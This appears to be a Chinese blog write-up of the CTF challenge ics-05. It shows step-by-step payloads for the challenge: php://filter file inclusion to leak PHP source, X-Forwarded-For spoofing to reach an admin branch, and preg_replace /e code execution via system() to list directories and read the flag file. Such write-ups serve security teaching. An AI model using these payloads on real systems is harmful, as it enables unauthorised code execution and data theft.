【攻防世界】ics-05(PHP伪协议+代码审计+Linux指令)

首先根据题目提示,进入云平台设备维护中心页面:

页面无异常,检查源代码:

 发现注入点 ?page=,大致有如下思路:1、SSTI模板引擎漏洞;2、XXS;3、PHP伪协议。

首先尝试SSTI漏洞,构造payload: ?page={{4*5}},提交结果如下:

发现页面无回显,说明大概率不存在SSTI漏洞。

然后测试XXS漏洞,构造payload: ?page=<script>alert("1")</script>,提交结果如下:

页面无响应,说明大概率不存在XSS漏洞。

最后测试PHP伪协议:

当payload为 ?page=index 时,页面如下:

当修改payload为 ?page=123 时,提交页面如下:

再次修改payload为: ?page=index.php 时:

页面显示OK,说明可能存在文件包含漏洞

上图引用文章自--上图出处

首先测试 php://input,php://input可以进行php代码的提交,抓包构造payload:

所以php://input不可行。

接着测试 php://filter,构造payload来包含index.php来获取它的源码:

payload: ?page=php://filter/resource=index.php

提交发现index.php被重复执行了:

说明源码中使用的文件包含函数是 include、require这类函数,这类函数直接包含文件会导致其中的代码直接被执行,若要包含文件而不希望其中的代码被执行,则可以考虑file_get_content()函数。

所以我们需要使用过滤器来读取源码:

构造payload: ?page=php://filter/read=convert.base64-encode/resource=index.php,提交页面如下:

得到经过 base64 加密后的源码,在解码工具中进行解码,得到index.php源码,如下:

<?php

$page = $_GET[page];

if (isset($page)) {



if (ctype_alnum($page)) {
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

<?php

}else{

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php

                if (strpos($page, 'input') > 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');  //输入值为index.php时回显OK的原因
                }
                    include($page);  //使用include()方法包含文件
                    die();
                ?>
        </p>
        <br /><br /><br /><br />

<?php
}}


//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

//以下才为关键代码:

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}





?>

解题关键在最后一个if判断中,若想判断返回True,则需要抓包修改 X-Forwarded-For:

X-Forwarded-For 是一个 HTTP 请求头部字段,用于指示客户端真实的 IP 地址,尤其是当请求经过了一个或多个代理服务器或负载均衡器时。这个字段的主要作用是提供了客户端的原始 IP 地址,即使请求经过了中间的代理服务器,也能够追踪到真实的客户端地址。

在http请求中添加X-Forwarded-For参数,发现成功回显。接下来的解题关键为 preg_replace()函数。

preg_replace(参数一,参数二,参数三)函数:

参数一:要搜索的正则表达式

参数二:用于替换匹配部分的字符串

参数三:要被进行替换的原始字符串

构造payload: ?pat=/abc/e&rep=system("ls")&sub=abc。

正则表达式中的 /e 修饰符在 PHP 中已经被废弃它表示在执行替换时将替换字符串作为 PHP 代码进行评估和执行。在较早的 PHP 版本中,preg_replace() 函数支持 /e 修饰符,但由于其存在严重的安全隐患,自 PHP 5.5.0 版本开始被弃用,并在 PHP 7.0.0 版本中完全移除。

利用正则表达式将 abc 替换为 system("ls"),再使用正则表达式 /e 来执行命令:

发现命令可以被成功执行,并发现可疑文件s3chahahaDir,构造新的payload,将当前目录切换至s3chahahaDir中并查找flag。

构造payload: ?pat=/abc/e&rep=system("cd%20s3chahahaDir%26%26ls")&sub=abc

%20:空格

%26:&

%26%26:&&

提交,页面如下:

发现目录下存在文件flag,猜测flag值很有可能就在文件flag中jia,于是构造新的payload去访问flag:

payload: ?pat=/abc/e&rep=system("cd%20s3chahahaDir/flag%26%26ls")&sub=abc,提交页面如下:

发现flag.php,构造payload访问flag.php:

payload: ?pat=/abc/e&rep=system("cat%20s3chahahaDir/flag/flag.php")&sub=abc

成功拿到flag。

  • 22
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值